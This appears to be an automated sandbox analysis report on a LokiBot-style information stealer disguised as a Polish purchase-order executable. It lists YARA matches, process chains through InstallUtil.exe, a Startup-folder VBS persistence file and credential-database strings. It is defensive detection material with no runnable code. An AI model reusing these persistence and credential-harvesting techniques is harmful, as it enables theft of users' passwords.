Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::getstringvalue
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::enumvalues
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::getstringvalue
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::enumvalues
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::getstringvalue
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::enumvalues
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::getstringvalue
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey

Detected potential crypto function

Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Code function: 0_2_015EE9B0	0_2_015EE9B0
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Code function: 0_2_015ECF30	0_2_015ECF30
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Code function: 0_2_015E9058	0_2_015E9058
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Code function: 0_2_015E9048	0_2_015E9048
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Code function: 0_2_015E9660	0_2_015E9660
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Code function: 0_2_015E96C0	0_2_015E96C0
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Code function: 0_2_05F80040	0_2_05F80040
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Code function: 0_2_05F80006	0_2_05F80006
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Code function: 0_2_076FDE60	0_2_076FDE60
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Code function: 0_2_076E0040	0_2_076E0040
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Code function: 0_2_076E0022	0_2_076E0022
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Code function: 6_2_013CCF30	6_2_013CCF30
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Code function: 6_2_013C9058	6_2_013C9058
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Code function: 6_2_013C9048	6_2_013C9048
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Code function: 6_2_013C9660	6_2_013C9660
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Code function: 6_2_013C96C0	6_2_013C96C0
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Code function: 6_2_074DDE60	6_2_074DDE60
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Code function: 6_2_074C0040	6_2_074C0040
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Code function: 6_2_074C0006	6_2_074C0006
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 7_2_0040BDEF	7_2_0040BDEF

Sample file is different than original file name gathered from version info

Uses 32bit PE files

Source: PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Yara signature match

Source: 00000006.00000002.2306805654.0000000004018000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: LokiBot_Dropper_Packed_R11_Feb18 date = 2018-02-14, hash1 = 3b248d40fd7acb839cc592def1ed7652734e0e5ef93368be3c36c042883a3029, author = Florian Roth, description = Auto-generated rule - file scan copy.pdf.r11, reference = https://app.any.run/tasks/401df4d9-098b-4fd0-86e0-7a52ce6ddbf5, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000000.00000002.2118042555.000000000412F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: LokiBot_Dropper_Packed_R11_Feb18 date = 2018-02-14, hash1 = 3b248d40fd7acb839cc592def1ed7652734e0e5ef93368be3c36c042883a3029, author = Florian Roth, description = Auto-generated rule - file scan copy.pdf.r11, reference = https://app.any.run/tasks/401df4d9-098b-4fd0-86e0-7a52ce6ddbf5, license = https://creativecommons.org/licenses/by-nc/4.0/

Source: 0.2.PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe.43ab5c8.13.raw.unpack, F3SOmS1RfeVd8H521qy.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe.43ab5c8.13.raw.unpack, F3SOmS1RfeVd8H521qy.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe.43ab5c8.13.raw.unpack, F3SOmS1RfeVd8H521qy.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe.43ab5c8.13.raw.unpack, F3SOmS1RfeVd8H521qy.cs	Cryptographic APIs: 'CreateDecryptor'

Source: 0.2.PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe.6fd0000.17.raw.unpack, ITaskFolder.cs	Task registration methods: 'RegisterTaskDefinition', 'RegisterTask'
Source: 0.2.PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe.6fd0000.17.raw.unpack, TaskFolder.cs	Task registration methods: 'RegisterTaskDefinition', 'RegisterTask', 'CreateFolder'
Source: 0.2.PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe.6fd0000.17.raw.unpack, Task.cs	Task registration methods: 'RegisterChanges', 'CreateTask'
Source: 0.2.PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe.6fd0000.17.raw.unpack, TaskService.cs	Task registration methods: 'CreateFromToken'

Source: 0.2.PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe.6fd0000.17.raw.unpack, TaskFolder.cs	Security API names: Microsoft.Win32.TaskScheduler.TaskFolder.GetAccessControl(System.Security.AccessControl.AccessControlSections)
Source: 0.2.PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe.6fd0000.17.raw.unpack, User.cs	Security API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
Source: 0.2.PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe.6fd0000.17.raw.unpack, TaskSecurity.cs	Security API names: Microsoft.Win32.TaskScheduler.TaskSecurity.GetAccessControlSectionsFromChanges()
Source: 0.2.PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe.6fd0000.17.raw.unpack, TaskSecurity.cs	Security API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)
Source: 0.2.PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe.6fd0000.17.raw.unpack, Task.cs	Security API names: Microsoft.Win32.TaskScheduler.Task.GetAccessControl(System.Security.AccessControl.AccessControlSections)
Source: 0.2.PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe.6fd0000.17.raw.unpack, TaskPrincipal.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()

Source: InstallUtil.exe	Binary or memory string: C*\AC:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Templates\Stub\Project1.vbp
Source: InstallUtil.exe, 00000002.00000002.3304176080.0000000000436000.00000040.00000400.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.3304177579.0000000000428000.00000040.00000400.00020000.00000000.sdmp	Binary or memory string: <@*\AC:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Templates\Stub\Project1.vbp
Source: PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe, 00000000.00000002.2118042555.000000000412F000.00000004.00000800.00020000.00000000.sdmp, PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe, 00000000.00000002.2118042555.0000000004227000.00000004.00000800.00020000.00000000.sdmp, FieldNames.exe, 00000006.00000002.2306805654.0000000004018000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.3304177579.0000000000401000.00000040.00000400.00020000.00000000.sdmp	Binary or memory string: `C6-@`C*\AC:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Templates\Stub\Project1.vbp
Source: InstallUtil.exe	Binary or memory string: @*\AC:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Templates\Stub\Project1.vbp

Source: classification engine

Classification label: mal100.troj.spyw.expl.evad.winEXE@8/5@2/2

Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\FieldNames.vbs

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Mutant created: NULL

Source: unknown

Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\FieldNames.vbs"

Source: PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%

Source: C:\Windows\System32\wscript.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: InstallUtil.exe	Binary or memory string: SELECT item1 FROM metadata WHERE id = 'password';
Source: LogfirebirdULzauCAPrOnmUabaculus.2.dr	Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe

File read: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe "C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe"
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
Source: unknown	Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\FieldNames.vbs"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Roaming\FieldNames.exe "C:\Users\user\AppData\Roaming\FieldNames.exe"
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Roaming\FieldNames.exe "C:\Users\user\AppData\Roaming\FieldNames.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"	Jump to behavior

Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: msvbvm60.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: vb6zz.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: winsqlite3.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: vbscript.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: vbscript.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrobj.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: msvbvm60.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: vb6zz.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: sxs.dll	Jump to behavior
